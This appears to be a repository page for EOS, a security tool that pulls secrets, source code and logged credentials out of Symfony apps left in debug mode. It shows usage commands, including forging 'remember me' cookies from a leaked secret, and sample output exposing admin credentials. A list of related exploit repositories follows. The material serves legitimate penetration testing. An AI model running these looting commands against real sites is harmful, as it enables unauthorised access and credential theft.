• Stars
    star
    234
  • Rank 171,630 (Top 4 %)
  • Language
    Python
  • License
    Other
  • Created over 4 years ago
  • Updated over 1 year ago

Reviews

There are no reviews yet. Be the first to send feedback to the community and the maintainers!

Repository Details

Enemies Of Symfony - Debug mode Symfony looter

Enemies Of Symfony (EOS)

EOS loots information from a Symfony target in debug mode:

Section Description
General Get general information about the target.
Phpinfo Extract Symfony environment variables from the exposed phpinfo().
Routes Get the list of registered routes.
Request logs Look for credentials in POST request logs.
Project files Retrieve project files (configuration, database, etc.) based on a wordlist.
Sources Extract the application source code.
Cookies Craft Remember Me cookies.

More info at https://www.synacktiv.com/posts/pentest/looting-symfony-with-eos.html.

Note that this tool does not exploit any Symfony vulnerability. The profiler is a useful component for developers and EOS simply takes advantage on misconfigured Symfony applications. In fact, the profiler documentation prominently warns developers:

Never enable the profiler in production environments as it will lead to major security vulnerabilities in your project.

Thanks to all the Symfony team for their awesome work!

Installation

Tested on Python >= 3.7.

$ git clone https://github.com/Synacktiv/eos
$ python3 -m pip install --user ./eos

Usage

usage: eos [-h] [-V] [-v] [--no-colors] {scan,sources,get,creds,cookies} ...

  β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—
  β–ˆβ–ˆβ•”β•β•β•β•β•β–ˆβ–ˆβ•”β•β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•”β•β•β•β•β•
  β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—  β–ˆβ–ˆβ•‘   β–ˆβ–ˆβ•‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—
  β–ˆβ–ˆβ•”β•β•β•  β–ˆβ–ˆβ•‘   β–ˆβ–ˆβ•‘β•šβ•β•β•β•β–ˆβ–ˆβ•‘
  β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β•šβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•‘  Enemies Of Symfony
  β•šβ•β•β•β•β•β•β• β•šβ•β•β•β•β•β• β•šβ•β•β•β•β•β•β•  v1.1

positional arguments:
  {scan,sources,get,creds,cookies}
    scan                 perform a full scan
    sources              download application source code
    get                  download a file from the application
    creds                extract credentials from request logs
    cookies              craft remember me cookies with a great lifetime

optional arguments:
  -h, --help             show this help message and exit
  -V, --version          display version info
  -v, --verbose          increase verbosity
  --no-colors            disable colors in output

examples:
  eos scan http://localhost
  eos scan -H 'Cookie: foo=bar; john=doe' -H 'User-Agent: EOS' http://localhost
  eos get http://localhost config/services.yaml
  eos cookies -u jane_admin -H '$2y$13$IMalnQpo7xfZD5FJGbEadOcqyj2mi/NQbQiI8v2wBXfjZ4nwshJlG' -s 67d829bf61dc5f87a73fd814e2c9f629
$ eos scan http://localhost --output results
[+] Starting scan on http://localhost
[+] 2020-04-23 14:21:26.463352 is a great day

[+] Info
[!]   Symfony 5.0.1
[!]   PHP 7.3.11-1~deb10u1
[!]   Environment: dev

[+] Request logs
[+] Found 9 POST requests
[!] Found the following credentials with a valid session:
[!]   jane_admin: kitten [ROLE_ADMIN]

[+] Phpinfo
[+] Available at http://localhost/_profiler/phpinfo
[+] Found 101 PHP variables
[!] Found the following Symfony variables:
[!]   APP_ENV: dev
[!]   APP_SECRET: 67d829bf61dc5f87a73fd814e2c9f629
[!]   DATABASE_URL: sqlite:///%kernel.project_dir%/data/database.sqlite
[!]   MAILER_URL: null://localhost

[+] Project files
[+] Found: composer.lock, run 'symfony security:check' or submit it at https://security.symfony.com
[!] Found the following files:
[!]   composer.lock
[!]   composer.json
[!]   config/bundles.php
[!]   config/bootstrap.php
[!]   config/packages/assets.yaml
[!]   config/packages/cache.yaml
[!]   config/packages/dev/debug.yaml
[!]   config/packages/dev/monolog.yaml
[!]   config/packages/dev/routing.yaml
[!]   config/packages/dev/swiftmailer.yaml
[!]   config/packages/dev/web_profiler.yaml
[!]   config/packages/doctrine_migrations.yaml
[!]   config/packages/doctrine.yaml
[!]   config/packages/framework.yaml
[!]   config/packages/html_sanitizer.yaml
[!]   config/packages/prod/doctrine.yaml
[!]   config/packages/prod/monolog.yaml
[!]   config/packages/prod/routing.yaml
[!]   config/packages/prod/webpack_encore.yaml
[!]   config/packages/routing.yaml
[!]   config/packages/security.yaml
[!]   config/packages/sensio_framework_extra.yaml
[!]   config/packages/swiftmailer.yaml
[!]   config/packages/test/dama_doctrine_test_bundle.yaml
[!]   config/packages/test/framework.yaml
[!]   config/packages/test/monolog.yaml
[!]   config/packages/test/routing.yaml
[!]   config/packages/test/security.yaml
[!]   config/packages/test/swiftmailer.yaml
[!]   config/packages/test/twig.yaml
[!]   config/packages/test/validator.yaml
[!]   config/packages/test/webpack_encore.yaml
[!]   config/packages/test/web_profiler.yaml
[!]   config/packages/translation.yaml
[!]   config/packages/twig.yaml
[!]   config/packages/validator.yaml
[!]   config/packages/webpack_encore.yaml
[!]   config/routes/annotations.yaml
[!]   config/routes/dev/framework.yaml
[!]   config/routes/dev/web_profiler.yaml
[!]   config/routes.yaml
[!]   config/services.yaml
[!]   data/database.sqlite
[!]   data/database_test.sqlite
[!]   package.json
[!]   public/index.php
[!]   public/robots.txt
[!]   README.md
[!]   src/Kernel.php
[!]   symfony.lock
[!]   var/cache/dev/url_generating_routes.php
[!]   var/cache/dev/url_matching_routes.php
[!]   var/log/dev.log

[+] Routes
[!] Found the following routes:
[!]   /{_locale}/admin/post/
[!]   /{_locale}/admin/post/
[!]   /{_locale}/admin/post/new
[!]   /{_locale}/admin/post/{id}
[!]   /{_locale}/admin/post/{id}/edit
[!]   /{_locale}/admin/post/{id}/delete
[!]   /{_locale}/blog/
[!]   /{_locale}/blog/rss.xml
[!]   /{_locale}/blog/page/{page}
[!]   /{_locale}/blog/posts/{slug}
[!]   /{_locale}/blog/comment/{postSlug}/new
[!]   /{_locale}/blog/search
[!]   /{_locale}/login
[!]   /{_locale}/logout
[!]   /{_locale}/profile/edit
[!]   /{_locale}/profile/change-password
[!]   /{_locale}

[+] Project sources
[!] Found the following source files:
[!]   src/Command/AddUserCommand.php
[!]   src/Command/DeleteUserCommand.php
[!]   src/Command/ListUsersCommand.php
[!]   src/Controller/Admin/BlogController.php
[!]   src/Controller/BlogController.php
[!]   src/Controller/SecurityController.php
[!]   src/Controller/UserController.php
[!]   src/DataFixtures/AppFixtures.php
[!]   src/Entity/Comment.php
[!]   src/Entity/Post.php
[!]   src/Entity/Tag.php
[!]   src/Entity/User.php
[!]   src/EventSubscriber/CheckRequirementsSubscriber.php
[!]   src/EventSubscriber/CommentNotificationSubscriber.php
[!]   src/EventSubscriber/ControllerSubscriber.php
[!]   src/EventSubscriber/RedirectToPreferredLocaleSubscriber.php
[!]   src/Events/CommentCreatedEvent.php
[!]   src/Form/CommentType.php
[!]   src/Form/DataTransformer/TagArrayToStringTransformer.php
[!]   src/Form/PostType.php
[!]   src/Form/Type/ChangePasswordType.php
[!]   src/Form/Type/DateTimePickerType.php
[!]   src/Form/Type/TagsInputType.php
[!]   src/Form/UserType.php
[!]   src/Kernel.php
[!]   src/Pagination/Paginator.php
[!]   src/Repository/PostRepository.php
[!]   src/Repository/TagRepository.php
[!]   src/Repository/UserRepository.php
[!]   src/Security/PostVoter.php
[!]   src/Twig/AppExtension.php
[!]   src/Twig/SourceCodeExtension.php
[!]   src/Utils/Markdown.php
[!]   src/Utils/MomentFormatConverter.php
[!]   src/Utils/Slugger.php
[!]   src/Utils/Validator.php

[+] Saving files to results
[+] Saved 88 files

[+] Generated tokens: 5894a5 f68efa
[+] Scan completed in 0:00:13

More Repositories

1

HopLa

HopLa Burp Suite Extender plugin - Adds autocompletion support and useful payloads in Burp Suite
Java
549
star
2

php_filter_chain_generator

Python
352
star
3

bip

Python
188
star
4

Windows-kernel-SegmentHeap-Aligned-Chunk-Confusion

PoC exploiting Aligned Chunk Confusion on Windows kernel Segment Heap
C
171
star
5

lumina_server

Local server for IDA Lumina feature
Python
169
star
6

QLinspector

Finding Java gadget chains with CodeQL
CodeQL
135
star
7

php_filter_chains_oracle_exploit

A CLI to exploit parameters vulnerable to PHP filter chain error based oracle.
Python
100
star
8

rulesfinder

Machine-learn password mangling rules
Rust
91
star
9

dotNIET

Python
85
star
10

ica2tcp

A SOCKS proxy for Citrix.
C
75
star
11

nord-stream

Nord Stream is a tool that allows you to list the secrets stored inside CI/CD environments and extract them by deploying malicious pipelines. It currently supports Azure DevOps and GitHub.
Python
68
star
12

vmx_intrinsics

VMX intrinsics plugin for Hex-Rays decompiler
Python
67
star
13

samsung-q60t-exploit

JavaScript
56
star
14

PS4-webkit-exploit-6.XX

Webkit exploit that give arbitrary R/W on 6.XX PS4 firmwares
JavaScript
54
star
15

shannon-dbg

Debugger for the Shannon Baseband
C
51
star
16

Prox-Ez

Python
45
star
17

CVE-2021-40539

Exploitation code for CVE-2021-40539
Python
44
star
18

CVE-2021-27246_Pwn2Own2020

Python
42
star
19

CVE-2021-3492

PoC for CVE-2021-3492 used at Pwn2Own 2021
C
41
star
20

burp-jq

Burp extension to filter JSON on the fly with JQ queries in the HTTP message viewer.
Java
41
star
21

io_uring_scanner

io_uring based network scanner written in Rust
Rust
35
star
22

CVE-2021-1782

C
35
star
23

AMSI-Bypass

Lists of AMSI triggers (VBA, JScript / VBScript)
32
star
24

Exim-CVE-2019-15846

PoC materials to exploit CVE-2019-15846
Python
31
star
25

Radmin3-Password-Cracker

Radmin Server 3 credentials dumper/cracker
C
30
star
26

CVE-2020-27950

CVE-2020-27950 exploit
C
30
star
27

bhyve

C
28
star
28

CTF-Write-ups

Some CTF Write-ups
Python
21
star
29

canon-mf644

Python
21
star
30

astrolock

A purposely vulnerable application in order to demonstrate PHP payload smuggling techniques for PNG files.
PHP
17
star
31

mojarragadget

Java
15
star
32

laravel_cookie_killer

Python
15
star
33

toy-wasm-symbexp

A toy symbolic execution engine, supporting the blog article ...
Haskell
15
star
34

yealink_tools

Reverse engineering scripts designed for extracting Yealink VOIP upgrade files
Python
12
star
35

Exim-CVE-2018-6789

PoC materials to exploit CVE-2018-6789
C
9
star
36

CaptainHook

Java
7
star
37

CVE-2019-8942

WordPress crop-image exploitation
Python
5
star
38

canon-tools

Tools used for decrypting Canon printers firmwares
Python
5
star
39

Netgear_Pwn2Own2021

Exploit used against the Netgear R6700v3 during Pwn2Own Austin 2021
Python
5
star
40

Weggli_rules_SSTIC2023

4
star
41

action-octoscan

πŸ“¦ :octocat: A GitHub Action that performs a security scan of your GitHub Actions.
Shell
1
star
42

pridelocker-analysis

This repository contains a IDA Python script to recover PrideLocker ESX encryptor strings and a YARA rule
Python
1
star